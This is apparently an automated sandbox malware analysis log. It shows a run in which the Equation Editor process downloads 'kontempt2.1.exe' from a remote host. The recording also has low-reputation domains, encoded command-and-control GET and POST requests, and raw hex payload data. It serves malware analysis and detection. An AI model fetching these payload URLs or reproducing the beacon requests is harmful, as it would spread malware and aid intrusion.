Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443

Networking

barindex
Performs DNS queries to domains with low reputation
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeDNS query: www.myprefpal.xyz
Source: Joe Sandbox ViewIP Address: 15.197.148.33 15.197.148.33
Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0360189B URLDownloadToFileW,2_2_0360189B
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: keep-aliveDate: Tue, 22 Oct 2024 13:01:39 GMTLast-Modified: Sat, 12 Mar 2022 13:56:34 GMTCache-Control: max-age=120ETag: "m622ca692s8a577"Content-type: application/zip; charset=utf-8Content-length: 566647Data Raw: 50 4b 03 04 14 00 00 00 08 00 a6 12 57 54 f6 08 b2 ad 9e 06 00 00 c6 1c 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 a8 37 15 62 a8 37 15 62 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 c9 b2 dd 26 10 40 f7 fe 1b fb a5 5c f9 01 af 93 4a b2 c8 4e 85 24 24 e1 8b 40 66 b8 83 bf 3e cd 70 45 37 20 67 f5 1e a7 2f d0 b4 7a 82 6f ff fe f9 c7 5f ff fc fd c9 fe 90 c2 f1 8f 81 ad ab e1 2b 73 7c 98 b4 72 fc e9 ba 12 af 10 f7 4e 0f f0 43 ae ac d0 8a e0 3b 9b bc df 87 83 ad dc 9e 82 91 4d 37 7f 0c 8b 50 c2 6e 35 05 e8 6a 16 a6 d3 2d b3 c0 f0 9d c1 04 b5 d6 02 eb f8 51 98 50 f3 30 4a 3d b6 e4 eb 6f 94 cd da 8f 92 53 26 f0 be 19 d4 f3 94 97 92 92 83 19 b6 73 c7 4d 65 ac 4a 08 23 fe bc 12 2a f8 5b c9 34 6c ce 0d 85 e4 23 9d e4 f3 d7 96 d5 6a df 99 f4 d5 0e 3f b9 d1 ad ad de 14 2f 00 c3 61 7c 39 fc 61 03 9a a4 b6 9c 22 7d 70 45 89 e1 6c ae 49 fb ab 87 81 ff 0b f2 f6 35 6c 4c cd 12 1b 20 40 27 76 ae 7d b1 c1 c4 d4 c4 e5 85 5f 4e b0 c4 ca 57 a3 c1 4d d8 3c 5f 60 f0 20 b3 f7 64 33 97 bc 28 85 25 8a 3f 7a 18 14 3b 8a 6e ad 84 ec 34 24 b9 ad c7 c5 ee 19 70 37 b0 e3 90 af 0b dc 51 bf c8 ee 5f ae 25 17 13 21 15 4c cc 5d f1 eb 49 8b 14 53 67 1a 84 3e 93 e2 27 ef 48 6e e7 34 db 4a 85 ba 73 d3 59 2f f1 0b 35 9a ef 92 e0 b3 b3 8e 96 73 07 1e 2d 3b 6e 2d b3 8e f5 74 8b f8 42 b5 24 eb 7d 8f b7 a4 f2 0e c9 99 89 11 09 39 0f 39 09 09 b9 38 42 8b 82 41 a5 64 0e 42 00 4e cd 67 3e 5f 0a 50 ca 00 91 df 15 cd 9a 6f 46 62 1e c3 76 3e cd 7d 19 ce cc b1 91 81 8e 24 bf f5 84 ed 82 33 9f a4 7b 1d ed b4 cc 3b 33 68 4a cf 54 b4 6a d1 b4 9e 61 4f c5 be 66 da 88 55 f4 27 20 51 3b 0f 8e 2b fb a6 28 92 ce 2c 9c f3 11 eb fc b2 63 2d 9a f7 27 bd ef c2 0d 9b d6 37 cc 0e 21 21 27 47 f7 58 b9 bb 90 78 4b fc 69 3f 70 76 3c 01 d1 4a 2d 62 c5 c3 a0 f6 30 8f 39 b5 17 09 d4 88 d8 6a 64 1f bd 14 e0 c5 2b 11 89 82 24 5b 40 77 6a ec cc bd 9a 7a db bc 79 bb cb 5b d2 d9 64 d7 b3 6f 8f 92 68 e7 e7 0f 08 68 fd 68 55 38 63 21 28 3d e8 f1 3b 2f c9 34 0a ab f8 02 23 4e 6c da f8 22 3d 6a ac 02 a5 46 07 d2 98 a1 fd 00 40 76 ef 50 77 32 a7 ba ad 55 29 3b 89 41 56 02 25 77 be 6b 43 24 90 c4 9c 2f a9 22 c4 28 33 60 00 38 15 82 96 1b 41 aa c1 30 1b 7d 64 6b 95 d9 a0 6e 08 07 a9 d9 dc 69 36 b3 d4 6e b0 c1 9c ac 50 64 c6 4c 7a 26 e3 dd ae d5 10 7d 5f 00 da 0c 7a 59 2c 72 7b 80 90 8a cb f0 c9 27 34 38 c0 74 b0 2f 00 0c 85 41 c1 11 75 0e 3f 6a d4 79 0b 0c b7 5e 86 b2 39 a3 63 c7 4f 1f a2 c4 68 49 60 f8 7a a7 87 b4 92 ef da 1b 28 b2 ad e0 41 20 ad c3 c3 62 38 1d b4 8e 12 69 4c 4d 27 5a 43 03 01 cd 56 4a 24 15 7e 06 1d 09 ab 26 43 89 61 12 0e 3f e9 3b 6a ec e0 43 ce c3 c6 d9 31 48 01 8b a2 cc 1c 6e 08 95 c3 c4 a6 d8 f8 a3 ec 7d e3 af 87 86 15 c0 0f a6 5b 4b 49 d8 bc 29 39 a6 64 36 f4 15 36 f4 15 46 3f 44 f9 90 52 8c a0 28 f1 be 82 e0 26 b0 8f e8 1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\kontempt2.1[1].htmJump to behavior
Source: global trafficHTTP traffic detected: GET /kontempt2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: timurtrading.my
Source: global trafficHTTP traffic detected: GET /kontempt2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: timurtrading.myConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /8pmv/?DtMH=kxoTeT1hyx&2PV85pl=o+HDgodiamRQHtDMpIt6QXV1yFQyIuHAMV1gOVYcjWmvuGh+h7IrtYfSQO/kpwxsxn8zwcxo4M/m/nbjbIRZpxhbjjpUXySeQkriE3Dek1xl8vaSGOlLDW237/Ca HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.omnibizlux.bizUser-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
Source: global trafficHTTP traffic detected: GET /2022/sqlite-dll-win32-x86-3380000.zip HTTP/1.1User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /quvp/?2PV85pl=ZW1g+h73VjV8NmrD3A0IsvQAl9tCTvv5s7OxxnbN69qnRFmJveufixywo3eCJN9Bi9pNL2fgeIfBDTgJwEUErU/4IwV0Yt2V4k+CbVZpThcE8pzI6qgsTHE3GSfU&DtMH=kxoTeT1hyx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.75e296qdx.topUser-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
Source: global trafficHTTP traffic detected: GET /2xrt/?2PV85pl=t8QlsLf/hSao5OfTjGXyvO3SE3egRcZN/0WYGutq4Zw3gZ9pwtfqpd7Txie7AUKWMV3AhFtCGrZ0PcR2NtL0Erm7E7qQmCH1czZzhi0sD+dlnO4gaz+HrJe+v97h&DtMH=kxoTeT1hyx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.myprefpal.xyzUser-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
Source: global trafficHTTP traffic detected: GET /to3j/?2PV85pl=jApFr+7+PXCxj/MoVVJ1BrMCoCw62P1GtIxP7MFIoy+IcxCptQTIZicQXM85kXEn8fuuasCKCCy3E0AKuRzTVtyVct6lEvO/8mUZ63PGcSN9z9MVRwPD85QlGJnP&DtMH=kxoTeT1hyx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.jilifish.winUser-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global trafficDNS traffic detected: DNS query: timurtrading.my
Source: global trafficDNS traffic detected: DNS query: www.omnibizlux.biz
Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
Source: global trafficDNS traffic detected: DNS query: www.75e296qdx.top
Source: global trafficDNS traffic detected: DNS query: www.myprefpal.xyz
Source: global trafficDNS traffic detected: DNS query: www.jilifish.win
Source: unknownHTTP traffic detected: POST /quvp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 2164Host: www.75e296qdx.topOrigin: http://www.75e296qdx.topReferer: http://www.75e296qdx.top/quvp/User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10Data Raw: 32 50 56 38 35 70 6c 3d 55 55 64 41 39 57 75 66 65 6e 46 41 52 57 58 6d 37 41 38 4a 69 66 77 39 31 4f 30 30 64 66 7a 77 6f 38 6d 6c 71 68 50 6e 73 4d 53 43 64 48 2b 50 38 64 43 54 37 54 43 37 6f 55 57 30 47 39 63 66 2f 4f 6c 59 4d 6d 58 37 61 4e 44 76 4e 53 34 4a 68 7a 49 6e 6d 46 72 69 46 68 4d 6c 55 35 61 6d 37 33 2f 52 62 56 5a 50 66 41 51 30 32 61 66 50 35 4c 30 52 62 68 6f 65 64 56 69 37 68 59 66 2f 42 78 64 55 34 48 2b 61 6f 75 33 75 56 34 6f 66 58 71 55 70 55 30 68 51 62 64 68 4a 